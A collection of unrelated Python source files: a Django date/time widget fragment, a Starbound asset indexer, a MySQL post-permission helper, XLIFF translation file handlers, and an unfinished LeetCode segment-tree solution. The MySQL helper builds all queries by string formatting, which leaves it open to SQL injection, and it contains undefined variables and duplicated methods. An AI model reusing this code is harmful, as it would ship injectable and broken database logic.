options['format'] = options.get('format', 'dd/mm/yyyy')
super(DateWidget, self).__init__(attrs, options, usel10n, bootstrap_version)
class TimeWidget(PickerWidgetMixin, TimeInput):
"""
TimeWidget is the corresponding widget for Time field, it renders only the time section of
datetime picker.
"""
format_name = 'TIME_INPUT_FORMATS'
glyphicon = 'glyphicon-time'
def __init__(self, attrs=None, options=None, usel10n=None, bootstrap_version=None):
if options is None:
options = {}
# Set the default options to show only the timepicker object
options['startView'] = options.get('startView', 1)
options['minView'] = options.get('minView', 0)
options['maxView'] = options.get('maxView', 1)
options['format'] = options.get('format', 'hh:ii')
super(TimeWidget, self).__init__(attrs, options, usel10n, bootstrap_version)
| |
"""
Module for reading and indexing Starbound assets
"""
import os
import json
import re
import sqlite3
import logging
import starbound
import starbound.btreedb4
from assets.blueprints import Blueprints
from assets.items import Items
from assets.species import Species
from assets.player import Player
from assets.monsters import Monsters
from assets.techs import Techs
from assets.images import Images
from assets.frames import Frames
from assets.common import asset_category
# Regular expression for comments
comment_re = re.compile(
'("(\\[\s\S]|[^"])*")|((^)?[^\S\n]*/(?:\*(.*?)\*/[^\S\n]*|/[^\n]*)($)?)',
re.DOTALL | re.MULTILINE
)
ignore_assets = re.compile(".*\.(db|ds_store|ini|psd|patch)", re.IGNORECASE)
def parse_json(content, key):
decoder = json.JSONDecoder(strict=False)
# Looking for comments
# Allows for // inside of the " " JSON data
content = comment_re.sub(lambda m: m.group(1) or '', content)
# Return json file
return decoder.decode(content)
def load_asset_file(filename):
with open(filename) as f:
content = ''.join(f.readlines())
return parse_json(content, filename)
class Assets(object):
def __init__(self, db_file, starbound_folder):
self.starbound_folder = starbound_folder
self.mods_folder = os.path.join(self.starbound_folder, "giraffe_storage", "mods")
self.db = sqlite3.connect(db_file)
self.vanilla_assets = os.path.join(self.starbound_folder, "assets", "packed.pak")
self.image_cache = {}
def init_db(self):
c = self.db.cursor()
c.execute("drop table if exists assets")
c.execute("""create table assets
(key text, path text, type text, category text, name text, desc text)""")
self.db.commit()
def total_indexed(self):
c = self.db.cursor()
try:
c.execute("select count(*) from assets")
except sqlite3.OperationalError:
# database may be corrupt
return 0
return c.fetchone()[0]
def create_index(self, asset_files=False):
logging.info("Creating new assets index...")
if not asset_files:
asset_files = self.find_assets()
blueprints = Blueprints(self)
items = Items(self)
species = Species(self)
monsters = Monsters(self)
techs = Techs(self)
frames = Frames(self)
new_index_query = "insert into assets values (?, ?, ?, ?, ?, ?)"
c = self.db.cursor()
for asset in asset_files:
yield (asset[0], asset[1])
tmp_data = None
if asset_category(asset[0]) != '':
if asset[0].endswith(".png"):
tmp_data = (asset[0], asset[1], "image", "", "", "")
elif blueprints.is_blueprint(asset[0]):
tmp_data = blueprints.index_data(asset)
elif species.is_species(asset[0]):
tmp_data = species.index_data(asset)
elif items.is_item(asset[0]):
tmp_data = items.index_data(asset)
elif monsters.is_monster(asset[0]):
tmp_data = monsters.index_data(asset)
elif techs.is_tech(asset[0]):
tmp_data = techs.index_data(asset)
elif frames.is_frames(asset[0]):
tmp_data = frames.index_data(asset)
else:
logging.warning("Skipping invalid asset (no file extension) %s in %s" % (asset[0], asset[1]))
if tmp_data is not None:
c.execute(new_index_query, tmp_data)
self.db.commit()
logging.info("Finished creating index")
def find_assets(self):
"""Scan all Starbound assets and return key/file list.
Includes mod files, .pak files.
"""
index = []
vanilla_path = os.path.join(self.starbound_folder, "assets")
logging.info("Scanning vanilla assets")
vanilla_assets = self.scan_asset_folder(vanilla_path)
[index.append(x) for x in vanilla_assets]
mods_path = self.mods_folder
if not os.path.isdir(mods_path):
return index
for mod in os.listdir(mods_path):
mod_folder = os.path.join(mods_path, mod)
if os.path.isdir(mod_folder):
logging.info("Scanning mod folder: " + mod)
mod_assets = self.scan_asset_folder(mod_folder)
[index.append(x) for x in mod_assets]
elif mod_folder.endswith(".modpak"):
logging.info("Scanning modpak: " + mod)
mod_assets = self.scan_modpak(mod_folder)
[index.append(x) for x in mod_assets]
return index
def scan_modpak(self, modpak):
# TODO: may need support for reading the mod folder from the pakinfo file
db = starbound.open_file(modpak)
index = [(x, modpak) for x in db.get_index()]
return index
def scan_asset_folder(self, folder):
pak_path = os.path.join(folder, "packed.pak")
if os.path.isfile(pak_path):
db = starbound.open_file(pak_path)
index = [(x, pak_path) for x in db.get_index()]
return index
else:
# old style, probably a mod
index = []
mod_assets = None
files = os.listdir(folder)
# TODO: will need more logic to handle .modpack with modinfo inside.
found_mod_info = False
for f in files:
if f.endswith(".modinfo"):
modinfo = os.path.join(folder, f)
try:
modinfo_data = load_asset_file(modinfo)
path = "./"
if "path" in modinfo_data.keys():
path = modinfo_data["path"]
mod_assets = os.path.join(folder, path)
found_mod_info = True
except ValueError:
# really old mods
folder = os.path.join(folder, "assets")
if os.path.isdir(folder):
mod_assets = folder
if mod_assets is None:
return index
elif found_mod_info and self.is_packed_file(mod_assets):
# TODO: make a .pak scanner function that works for vanilla and mods
pak_path = os.path.normpath(mod_assets)
db = starbound.open_file(pak_path)
for x in db.get_index():
# removes thumbs.db etc from user pak files
if re.match(ignore_assets, x) is None:
index.append((x, pak_path))
return index
elif not os.path.isdir(mod_assets):
return index
# now we can scan!
for root, dirs, files in os.walk(mod_assets):
for f in files:
if re.match(ignore_assets, f) is None:
asset_folder = os.path.normpath(mod_assets)
asset_file = os.path.normpath(os.path.join(root.replace(folder, ""), f))
index.append((asset_file, asset_folder))
return index
def is_packed_file(self, path):
"""
Returns true if the asset path is a file (will be assuming from the index that it is a packed type)
Returns false if the asset path is a folder (legacy/non-packed mods)
"""
return os.path.isfile(path)
def read(self, key, path, image=False):
if self.is_packed_file(path):
key = key.lower()
db = starbound.open_file(path)
# try the cache first
if image and key in self.image_cache:
return self.image_cache[key]
try:
data = db.get(key)
except KeyError:
if image and path != self.vanilla_assets:
img = self.read(key, self.vanilla_assets, image)
self.image_cache[key] = img
return img
else:
logging.exception("Unable to read db asset '%s' from '%s'" % (key, path))
return None
if image:
img = data
self.image_cache[key] = img
return img
else:
try:
asset = parse_json(data.decode("utf-8"), key)
return asset
except ValueError:
logging.exception("Unable to read db asset '%s' from '%s'" % (key, path))
return None
else:
asset_file = os.path.join(path, key[1:])
try:
if image:
img = open(asset_file, "rb").read()
self.image_cache[key] = img
return img
else:
asset = load_asset_file(asset_file)
return asset
except (FileNotFoundError, ValueError):
if image and path != self.vanilla_assets:
if self.is_packed_file(self.vanilla_assets):
img = self.read(key.replace("\\", "/"), self.vanilla_assets, image)
self.image_cache[key] = img
return img
else:
img = self.read(key, self.vanilla_assets, image)
self.image_cache[key] = img
return img
else:
logging.exception("Unable to read asset file '%s' from '%s'" % (key, path))
return None
def blueprints(self):
return Blueprints(self)
def items(self):
return Items(self)
def species(self):
return Species(self)
def player(self):
return Player(self)
def monsters(self):
return Monsters(self)
def techs(self):
return Techs(self)
def images(self):
return Images(self)
def frames(self):
return Frames(self)
def get_all(self, asset_type):
c = self.assets.db.cursor()
c.execute("select * from assets where type = ? order by name collate nocase", (asset_type,))
return c.fetchall()
def get_categories(self, asset_type):
c = self.assets.db.cursor()
c.execute("select distinct category from assets where type = ? order by category", (asset_type,))
return [x[0] for x in c.fetchall()]
def filter(self, asset_type, category, name):
if category == "<all>":
category = "%"
name = "%" + name + "%"
c = self.db.cursor()
q = """select * from assets where type = ? and category like ?
and (name like ? or desc like ?) order by desc, name collate nocase"""
c.execute(q, (asset_type, category, name, name))
result = c.fetchall()
return result
def get_total(self, asset_type):
c = self.assets.db.cursor()
c.execute("select count(*) from assets where type = ?", (asset_type))
return c.fetchone()[0]
def missing_icon(self):
return self.read("/interface/inventory/x.png", self.vanilla_assets, image=True)
def get_mods(self):
"""Return a list of all unique mod paths."""
c = self.db.cursor()
c.execute("select distinct path from assets order by category")
all_assets = [x[0].replace(self.starbound_folder, "") for x in c.fetchall()]
return [x for x in all_assets if not x.endswith("packed.pak")]
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
assets = Assets("assets.db", "/opt/starbound")
assets.init_db()
logging.info("Started indexing...")
count = 0
for i in assets.create_index():
count += 1
print(count)
logging.info("Finished!")
| |
import mysql.connector
from databasehelper import *
from authorhelper import *
import sys
sys.path.append("sys/model")
from post import *
import json
class PostHelper:
"""
#an post helper,which controls the post model
"""
dbHelper = None
def __init__(self,dbHelper):
self.dbHelper = dbHelper
"""
to add a post to databse
dbhelper -- the databasehelper
post -- the post object
"""
def addPost(self,post):
cur = self.dbhelper.getcursor()
pid = post.getpid()
aid = post.getaid()
title = post.gettitle()
message = post.getmessage()
type = post.gettype()
permission = post.getpermission()
query = "INSERT INTO post VALUES('%s','%s',NULL,'%s','%s','%s','%s')"%(pid,aid,title,message,type,permission)
try:
cur.execute(query)
self.dbHelper.commit()
except mysql.connector.Error as err:
print("****************************************")
print("SQLException from addPost():")
print("Error code:", err.errno)
print("SQLSTATE value:", err.sqlstate)
print("Error message:", err.msg)
print("Might be query issue:",query)
print("****************************************")
return False
except Exception as err:
print("General Exception from addPost():".format(err))
return False
return cur.rowcount>0
"""add a user permission to post in databse
dbhelper -- databse helper
pid -- post id
aid -- author id
"""
def addPostPermission(self,dbhelper,pid,aid):
cur = self.dbHelper.getcursor()
query = "INSERT INTO user_permission VALUES('%s','%s')"%(pid,aid)
try:
cur.execute(query)
self.dbHelper.commit()
except mysql.connector.Error as err:
print("****************************************")
print("SQLException is raised by addPostPermission():")
print("Error code:", err.errno)
print("SQLSTATE value:", err.sqlstate)
print("Error message:", err.msg)
print("Might be query issue:",query)
print("****************************************")
return False
except Exception as err:
print("General Exception from addPostPermission():".format(err))
return False
return cur.rowcount>0
#type argument should be one of ['pid','aid','time','message','title','permission']
#Usage: updatepost(databasehelper,pid,type="html", permmision="public") check keyword argument
def updateMessage(self,pid,newContent):
"""
to update the message in post
Keyword arguments:
dbhelper -- database helper
pid -- post id
newcontent -- the new Content in post
"""
cur = self.dbHelper.getcursor()
query = "UPDATE post SET message='%s' WHERE pid='%s'"%(newContent,pid)
try:
cur.execute(query)
self.dbHelper.commit()
except mysql.connector.Error as err:
print("****************************************")
print("SQLException is raised by updateMessage():")
print("Error code:", err.errno)
print("SQLSTATE value:", err.sqlstate)
print("Error message:", err.msg)
print("Might be query issue:",query)
print("****************************************")
return False
except Exception as err:
print("General Exception is raised by updateMessage():".format(err))
return False
return cur.rowcount>0
def updateMessage(self,pid,newtitle):
"""
to update the title of post
pid -- post id
newtitle -- new title need to be updated
"""
cur = self.dbHelper.getcursor()
query = "UPDATE post SET title='%s' WHERE pid='%s'"%(newtitle,pid)
try:
cur.execute(query)
self.dbHelper.commit()
except mysql.connector.Error as err:
print("****************************************")
print("SQLException is raised by updateTime():")
print("Error code:", err.errno)
print("SQLSTATE value:", err.sqlstate)
print("Error message:", err.msg)
print("Might be query issue:",query)
print("****************************************")
return False
except Exception as err:
print("General Exception is raised by updateTime():".format(err))
return False
return cur.rowcount>0
def updateTime(self,dbhelper,pid,time = ''):
"""
to update the time of post
time -- time format should be like 2014-03-01 01:37:50, the default time is current time.
"""
cur = self.dbHelper.getcursor()
if time == '':
query = "UPDATE post SET time=NULL WHERE pid='%s'"%(pid)
else:
query = "UPDATE post SET time='%s' WHERE pid='%s'"%(time,pid)
try:
cur.execute(query)
self.dbHelper.commit()
except mysql.connector.Error as err:
print("****************************************")
print("SQLException is raised by updateTime():")
print("Error code:", err.errno)
print("SQLSTATE value:", err.sqlstate)
print("Error message:", err.msg)
print("Might be query issue:",query)
print("****************************************")
return False
except Exception as err:
print("General Exception is raised by authorAuthenticate():".format(err))
return False
return cur.rowcount>0
# if you need change to permission to user, you need to specify the user aid
# HAVEN'T BEEN COMPLETED YET
def updatePermission(self,pid,newPermission,user=''):
"""
to update the permission
pid -- post id
newpermission -- the new permission need to be update
user -- if the new permission is user, user is the aid
"""
cur = self.dbHelper.getcursor()
query = "UPDATE post SET permission='%s' WHERE pid='%s'"%(newPermission,pid)
cur.execute(query)
if newPermission == 'user':
#TODO:Change the following
print("neeed to be fixed")
#self.addUserPermission(dbhelper,pid,user)
else:
query = "DELETE FROM user_permission WHERE pid='%s'"%(pid)
try:
cur.execute(query)
self.dbHelper.commit()
except mysql.connector.Error as err:
print("****************************************")
print("SQLException is raised by updatePermission():")
print("Error code:", err.errno)
print("SQLSTATE value:", err.sqlstate)
print("Error message:", err.msg)
print("Might be query issue:",query)
print("****************************************")
return False
except Exception as err:
print("General Exception is raised by updatePermission():".format(err))
return False
return cur.rowcount>0
def deletePostByPid(self,pid):
"""
delete a post or server post by pid, aid
dbhelper -- database helper
pid -- post id
"""
cur = self.dbHelper.getcursor()
query=""
if type == "pid":
query = "DELETE FROM post WHERE pid = '%s'"%(key)
try:
cur.execute(query)
self.dbHelper.commit()
except mysql.connector.Error as err:
print("****************************************")
print("SQLException is raised by deletePostByPid():")
print("Error code:", err.errno)
print("SQLSTATE value:", err.sqlstate)
print("Error message:", err.msg)
print("Might be query issue:",query)
print("****************************************")
return False
except Exception as err:
print("General Exception is raised by deletePostByPid():".format(err))
return False
return cur.rowcount>0
def deletePostByAid(self,aid):
"""
to delete a post by authorid
aid -- author id
dbhelper -- database helper
"""
cur = self.dbHelper.getcursor()
query=""
if type == "aid":
query = "DELETE FROM post WHERE aid = '%s'"%(aid)
try:
cur.execute(query)
self.dbHelper.commit()
except mysql.connector.Error as err:
print("****************************************")
print("SQLException is raised by deletePostByAid():")
print("Error code:", err.errno)
print("SQLSTATE value:", err.sqlstate)
print("Error message:", err.msg)
print("Might be query issue:",query)
print("****************************************")
return False
except Exception as err:
print("General Exception from deletePostByAid():".format(err))
return False
return cur.rowcount>0
def getPostList(self,aid):
"""
get list of post that the user by aid can browse
aid -- author id
"""
re = {}
cur = self.dbHelper.getcursor()
#get the post if it is public
query = "SELECT * FROM post WHERE permission='public';"
try:
cur.execute(query)
except mysql.connector.Error as err:
print("****************************************")
print("SQLException from getPostList():")
print("Error code:", err.errno)
print("SQLSTATE value:", err.sqlstate)
print("Error message:", err.msg)
print("1st Query:",query)
print("****************************************")
return None
except Exception as err:
print("General Exception from getPostList() 1st block:".format(err))
return None
if cur != None:
for ele in cur:
pid = ele[0]
aid = ele[1]
time = ele[2].strftime("%Y-%m-%d %H:%M:%S")
title = ele[3]
msg = ele[4]
msgType = ele[5]
permission = ele[6]
post = Post(pid,aid,time,title,msg,msgType,permission)
re[pid]=post.tojson()
#get the post if aid is its author
query = "SELECT * FROM post WHERE permission='me' and aid='%s'"%(aid)
try:
cur.execute(query)
except mysql.connector.Error as err:
print("****************************************")
print("SQLException from getPostList():")
print("Error code:", err.errno)
print("SQLSTATE value:", err.sqlstate)
print("Error message:", err.msg)
print("2nd Query:",query)
print("****************************************")
return None
except Exception as err:
print("General Exception from getPostList() 2nd block:".format(err))
return None
if cur != None:
for ele in cur:
pid = ele[0]
aid = ele[1]
time = ele[2].strftime("%Y-%m-%d %H:%M:%S")
title = ele[3]
msg = ele[4]
msgType = ele[5]
permission = ele[6]
post = Post(pid,aid,time,title,msg,msgType,permission)
re[pid]=post.tojson()
#get the post if aid is specifiied user
query = "SELECT * FROM post WHERE permission = 'user' and pid IN (SELECT pid from user_permission WHERE aid='%s')"%(aid)
try:
cur.execute(query)
except mysql.connector.Error as err:
print("****************************************")
print("SQLException from getPostList():")
print("Error code:", err.errno)
print("SQLSTATE value:", err.sqlstate)
print("Error message:", err.msg)
print("3rd Query:",query)
print("****************************************")
return None
except Exception as err:
print("General Exception from getPostList() 3rd block:".format(err))
return None
if cur != None:
for ele in cur:
pid = ele[0]
aid = ele[1]
time = ele[2].strftime("%Y-%m-%d %H:%M:%S")
title = ele[3]
msg = ele[4]
msgType = ele[5]
permission = ele[6]
post = Post(pid,aid,time,title,msg,msgType,permission)
re[pid]=post.tojson()
#get the post if aid is the author's friend
authorHelper = AuthorHelper(self.dbHelper)
authorName = authorHelper.getAuthorNameByAid(aid)
try:
if(authorName == None):
raise Exception('Failed to get the name by id in getPostList() function')
except Exception as err:
print("***************************************")
print(err.args)
print("***************************************")
return None
query = "SELECT * FROM post WHERE permission = 'friends' and aid IN (SELECT aid from author WHERE author_name IN (SELECT name1 FROM circle WHERE name2 ='%s' ))"%(authorName)
try:
cur.execute(query)
except mysql.connector.Error as err:
print("****************************************")
print("SQLException from getPostList():")
print("Error code:", err.errno)
print("SQLSTATE value:", err.sqlstate)
print("Error message:", err.msg)
print("4th Query",query)
print("****************************************")
return None
except Exception as err:
print("General Exception from getPostList() 4th block:".format(err))
return None
if cur != None:
for ele in cur:
pid = ele[0]
aid = ele[1]
time = ele[2].strftime("%Y-%m-%d %H:%M:%S")
title = ele[3]
msg = ele[4]
msgType = ele[5]
permission = ele[6]
post = Post(pid,aid,time,title,msg,msgType,permission)
re[pid]=post.tojson()
#get the post if aid is the author's friends`s friend
query = "SELECT * FROM post WHERE permission = 'fof' and aid IN (SELECT aid from author WHERE author_name IN (SELECT name1 FROM circle WHERE name2 IN (SELECT name1 FROM circle WHERE name2 = '%s')))"%(authorName)
try:
cur.execute(query)
except mysql.connector.Error as err:
print("****************************************")
print("SQLException from getPostList():")
print("Error code:", err.errno)
print("SQLSTATE value:", err.sqlstate)
print("Error message:", err.msg)
print("5th Query",query)
print("****************************************")
return None
except Exception as err:
print("General Exception from getPostList() 5th block:".format(err))
return None
if cur != None:
for ele in cur:
pid = ele[0]
aid = ele[1]
time = ele[2].strftime("%Y-%m-%d %H:%M:%S")
title = ele[3]
msg = ele[4]
msgType = ele[5]
permission = ele[6]
post = Post(pid,aid,time,title,msg,msgType,permission)
re[pid]=post.tojson()
#get the post if aid is in the same host as the permission's requirement
query = "SELECT * FROM post WHERE permission='fomh' AND aid IN (SELECT a1.aid FROM author a1,author a2 WHERE a1.sid = a2.sid AND a2.aid = '%s')"%(aid)
try:
cur.execute(query)
except mysql.connector.Error as err:
print("****************************************")
print("SQLException from getPostList():")
print("Error code:", err.errno)
print("SQLSTATE value:", err.sqlstate)
print("Error message:", err.msg)
print("6th Query:",query)
print("****************************************")
return None
except Exception as err:
print("General Exception from getPostList() 6th block:".format(err))
return None
if cur != None:
for ele in cur:
pid = ele[0]
aid = ele[1]
time = ele[2].strftime("%Y-%m-%d %H:%M:%S")
title = ele[3]
msg = ele[4]
msgType = ele[5]
permission = ele[6]
post = Post(pid,aid,time,title,msg,msgType,permission)
re[pid]=post.tojson()
return json.dumps(re)
| |
import copy
import glob
import os
import re
from xml.etree import ElementTree
class FileFormat(object):
def reader(self):
raise NotImplementedError
def writer(self, append=False):
raise NotImplementedError
class DevNullFileFormat(FileFormat):
class NullWriter(object):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
pass
def write(self, src_line, tgt_line):
pass
class NullReader(object):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
pass
def __iter__(self):
return self
def __next__(self):
raise StopIteration
def reader(self):
return self.NullReader()
def writer(self, append=False):
return self.NullWriter()
class ParallelFileFormat(FileFormat):
class Reader(object):
def __init__(self, src_file, tgt_file) -> None:
self._src_file = src_file
self._tgt_file = tgt_file
self._src_stream = None
self._tgt_stream = None
def __enter__(self):
self._src_stream = open(self._src_file, 'r', encoding='utf-8')
self._tgt_stream = open(self._tgt_file, 'r', encoding='utf-8')
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._src_stream.close()
self._tgt_stream.close()
def __iter__(self):
for src_line, tgt_line in zip(self._src_stream, self._tgt_stream):
yield src_line.rstrip('\n'), tgt_line.rstrip('\n')
class Writer(object):
def __init__(self, src_file, tgt_file, append=False) -> None:
self._src_file = src_file
self._tgt_file = tgt_file
self._src_stream = None
self._tgt_stream = None
self._append = append
def __enter__(self):
mode = 'a' if self._append else 'w'
self._src_stream = open(self._src_file, mode, encoding='utf-8')
self._tgt_stream = open(self._tgt_file, mode, encoding='utf-8')
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._src_stream.close()
self._tgt_stream.close()
def write(self, src_line, tgt_line):
src_line, tgt_line = src_line.rstrip('\n').replace('\n', ' '), tgt_line.rstrip('\n').replace('\n', ' ')
self._src_stream.write(src_line + '\n')
self._tgt_stream.write(tgt_line + '\n')
@classmethod
def from_path(cls, src_lang, tgt_lang, name, path):
src_file = os.path.join(path, name + '.' + src_lang)
tgt_file = os.path.join(path, name + '.' + tgt_lang)
return cls(src_lang, tgt_lang, src_file, tgt_file)
@classmethod
def list(cls, src_lang, tgt_lang, path):
result = []
for src_file in glob.glob(os.path.join(path, '*.' + src_lang)):
tgt_file = os.path.splitext(src_file)[0] + '.' + tgt_lang
if os.path.isfile(tgt_file):
result.append(cls(src_lang, tgt_lang, src_file, tgt_file))
return result
def __init__(self, src_lang, tgt_lang, src_file, tgt_file) -> None:
self._src_lang = src_lang
self._tgt_lang = tgt_lang
self._src_file = src_file
self._tgt_file = tgt_file
self._name = os.path.splitext(os.path.basename(src_file))[0]
@property
def name(self):
return self._name
@property
def src_lang(self):
return self._src_lang
@property
def tgt_lang(self):
return self._tgt_lang
@property
def src_file(self):
return self._src_file
@property
def tgt_file(self):
return self._tgt_file
def reader(self):
return self.Reader(self._src_file, self._tgt_file)
def writer(self, append=False):
return self.Writer(self._src_file, self._tgt_file, append=append)
class CompactFileFormat(FileFormat):
class Reader(object):
def __init__(self, file_path, include_meta=False) -> None:
self._file_path = file_path
self._stream = None
self._include_meta = include_meta
def __enter__(self):
self._stream = open(self._file_path, 'r', encoding='utf-8')
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._stream.close()
def __iter__(self):
for src_line in self._stream:
src_line = src_line.rstrip('\n')
tgt_line = self._stream.readline().rstrip('\n')
meta = self._stream.readline().strip()
if self._include_meta:
meta = meta.split(',', maxsplit=2)
src_lang, tgt_lang = meta[1].split()
tuid = meta[2] if len(meta) > 2 else None
yield tuid, src_lang, tgt_lang, src_line, tgt_line
else:
yield src_line, tgt_line
class Writer(object):
def __init__(self, src_lang, tgt_lang, file_path, append=False) -> None:
self._src_lang = src_lang
self._tgt_lang = tgt_lang
self._file_path = file_path
self._stream = None
self._append = append
def __enter__(self):
mode = 'a' if self._append else 'w'
self._stream = open(self._file_path, mode, encoding='utf-8')
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._stream.close()
def write(self, src_line, tgt_line, tuid=None):
src_line, tgt_line = src_line.rstrip('\n').replace('\n', ' '), tgt_line.rstrip('\n').replace('\n', ' ')
self._stream.write(src_line + '\n')
self._stream.write(tgt_line + '\n')
if tuid is not None:
meta = '0,%s %s,%s\n' % (self._src_lang, self._tgt_lang, tuid)
else:
meta = '0,%s %s\n' % (self._src_lang, self._tgt_lang)
self._stream.write(meta)
def __init__(self, src_lang, tgt_lang, file_path) -> None:
self._src_lang = src_lang
self._tgt_lang = tgt_lang
self._file_path = file_path
self._name = os.path.splitext(os.path.basename(file_path))[0]
@property
def name(self):
return self._name
@property
def src_lang(self):
return self._src_lang
@property
def tgt_lang(self):
return self._tgt_lang
@property
def file_path(self):
return self._file_path
def reader(self):
return self.Reader(self._file_path, include_meta=False)
def reader_with_metadata(self):
return self.Reader(self._file_path, include_meta=True)
def writer(self, append=False):
return self.Writer(self._src_lang, self._tgt_lang, self._file_path, append=append)
class XLIFFFileFormat(FileFormat):
NAMESPACES = {
'xlf': 'urn:oasis:names:tc:xliff:document:1.2',
'sdl': 'http://sdl.com/FileTypes/SdlXliff/1.0',
'mq': 'MQXliff'
}
DEFAULT_NAMESPACE = 'urn:oasis:names:tc:xliff:document:1.2'
SDL_NAMESPACE = 'http://sdl.com/FileTypes/SdlXliff/1.0'
class TransUnit(object):
@classmethod
def parse(cls, tu, target_lang):
entries = []
ns = XLIFFFileFormat.NAMESPACES
# Target part
target_tag = tu.find('xlf:target', ns)
if target_tag is None:
target_tag = ElementTree.Element('target', attrib={
'xml:lang': target_lang
})
tu.append(target_tag)
# Source part
source_tag = tu.find('xlf:seg-source', ns)
if source_tag is None:
source_tag = tu.find('xlf:source', ns)
segments = source_tag.findall('.//xlf:mrk[@mtype="seg"]', ns)
if segments is None or len(segments) == 0:
entries.append((source_tag, target_tag))
else:
for source_segment in segments:
mid = source_segment.get('mid')
if mid is None:
raise ValueError('Invalid XLIFF, missing "mid" for <mrk>')
target_segment = target_tag.find('.//xlf:mrk[@mtype="seg"][@mid="%s"]' % mid, ns)
if target_segment is None:
raise ValueError('Invalid XLIFF, unable to locate <mrk> element for "mid" %s '
'in <target> element' % mid)
entries.append((source_segment, target_segment))
return cls(entries)
def __init__(self, entries):
self._entries = entries
def __iter__(self):
for entry in self._entries:
yield entry
@classmethod
def _skip_source_tag(cls, tu, source_tag):
if 'mid' in source_tag.attrib:
_id = source_tag.attrib['mid']
match = tu.find('.//sdl:seg[@id="%s"][@percent="100"]' % _id, cls.NAMESPACES)
return True if match is not None else False
else:
target_tag = tu.find('xlf:target', XLIFFFileFormat.NAMESPACES)
text = ''.join(target_tag.itertext())
return len(text.strip()) > 0
@classmethod
def _get_tag_name(cls, e):
return e.tag if '}' not in e.tag else e.tag.split('}', 1)[1]
@classmethod
def _get_source_content(cls, element):
if element is None:
return None, None
def _navigate(el, placeholders):
for child in list(el):
name = cls._get_tag_name(child)
if name in ['ph', 'bpt', 'ept', 'it']:
clone = copy.deepcopy(child)
clone.tail = None
placeholders.append(clone)
child.text = None
child.attrib = {'id': str(len(placeholders))}
else:
_navigate(child, placeholders)
return el, placeholders
content, _placeholders = _navigate(copy.deepcopy(element), [])
content = ElementTree.tostring(content, encoding='utf-8', method='xml').decode('utf-8')
content = content[content.find('>') + 1:]
content = content[:content.rfind('</%s>' % cls._get_tag_name(element))]
return (content, _placeholders) if len(content) > 0 else (None, None)
def __init__(self, file_path, tgt_lang) -> None:
self._file_path = file_path
self._output_file = file_path
self._units = []
for namespace, uri in self.NAMESPACES.items():
if namespace == 'xlf':
namespace = ''
ElementTree.register_namespace(namespace, uri)
with open(file_path, 'r', encoding='utf-8') as in_stream:
self._xliff = ElementTree.fromstring(in_stream.read())
for tu in self._xliff.findall('.//xlf:trans-unit', self.NAMESPACES):
trans_unit = self.TransUnit.parse(tu, tgt_lang)
for source_tag, target_tag in trans_unit:
if self._skip_source_tag(tu, source_tag):
continue
source_content, placeholders = self._get_source_content(source_tag)
if source_content is None:
continue
self._units.append((source_tag, target_tag))
def write_to(self, output_file):
self._output_file = output_file
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
pass
def __iter__(self):
for st, tt in self._units:
src_content, _ = self._get_source_content(st)
tgt_content, _ = self._get_source_content(tt)
yield src_content, tgt_content
def reader(self):
return self
def writer(self, append=False):
class _Writer(object):
def __init__(self, xliff, units, output_file, get_content_f):
self._index = 0
self._xliff = xliff
self._units = units
self._xlf_ns = XLIFFFileFormat.NAMESPACES['xlf']
self._get_content_f = get_content_f
self._output_file = output_file
self._output_stream = None
def __enter__(self):
self._output_stream = open(self._output_file, 'w', encoding='utf-8')
return self
def __exit__(self, exc_type, exc_val, exc_tb):
xliff_str = ElementTree.tostring(self._xliff, encoding='utf-8', method='xml').decode('utf-8')
self._output_stream.write(xliff_str)
self._output_stream.write('\n')
self._output_stream.close()
def write(self, _, content):
source_tag, target_tag = self._units[self._index]
self._index += 1
source_text, placeholders = self._get_content_f(source_tag)
trailing_match = re.search(r'\s*$', source_text)
trailing_space = trailing_match.group() if trailing_match is not None else ''
content = u'<content xmlns="%s">%s</content>' % (self._xlf_ns, content.rstrip() + trailing_space)
content = ElementTree.fromstring(content)
# Replace placeholders
parent_map = dict((c, p) for p in content.getiterator() for c in p)
for i, source in enumerate(placeholders):
target = content.find('.//%s[@id="%d"]' % (source.tag, i + 1))
if target is not None:
source.tail = target.tail
parent = parent_map[target]
parent_index = list(parent).index(target)
parent.remove(target)
parent.insert(parent_index, source)
# Clear target element
for child in list(target_tag):
target_tag.remove(child)
# Replace target content
target_tag.text = content.text
for child in list(content):
content.remove(child)
target_tag.append(child)
return _Writer(self._xliff, self._units, self._output_file, self._get_source_content)
| |
__source__ = 'https://leetcode.com/problems/range-sum-query-immutable/'
# https://github.com/kamyu104/LeetCode/blob/master/Python/range-sum-query-immutable.py
# Time: ctor: O(n),
# update: O(logn),
# query: O(logn)
# Space: O(n)
#
# Description: Leetcode # 303. Range Sum Query - Immutable
#
# Given an integer array nums, find the sum of
# the elements between indices i and j (i <= j), inclusive.
#
# The update(i, val) function modifies nums by
# updating the element at index i to val.
# Example:
# Given nums = [1, 3, 5]
#
# sumRange(0, 2) -> 9
# update(1, 2)
# sumRange(0, 2) -> 8
# Note:
# The array is only modifiable by the update function.
# You may assume the number of calls to update
# and sumRange function is distributed evenly.
#
# Companies
# Palantir
# Related Topics
# Dynamic Programming
# Similar Questions
# Range Sum Query 2D - Immutable Range Sum Query - Mutable Maximum Size Subarray Sum Equals k
#
import unittest
# Segment Tree solutoin.
class NumArray(object):
def __init__(self, nums):
"""
initialize your data structure here.
:type nums: List[int]
"""
# Build segment tree.
self.__nums = nums
def buildHelper(nums, start, end):
if start > end:
return None
# The root's start and end is given by build method.
root = self.__SegmentTreeNode(start, end, 0)
# If start equals to end, there will be no children for this node.
if start == end:
root.sum = nums[start]
return root
# Left child: start=nums.left, end=(nums.left + nums.right) / 2.
root.left = buildHelper(nums, start, (start + end) / 2)
# Right child: start=(nums.left + nums.right) / 2 + 1, end=nums.right.
root.right = buildHelper(nums, (start + end) /2 + 1, end)
#Update sum.
root.sum = (root.left.sum if root.left else 0) + \
(root.right.sum if root.right else 0)
return root
self.__root = buildHelper(nums, 0, len(nums) - 1)
def update(self, i, val):
"""
:type i: int
:type val: int
:rtype: int
"""
def updateHelper(root, i, val):
# Out of range.
if not root or root.start > i or root.end < i:
return
# Change the node's value with [i] to the new given value.
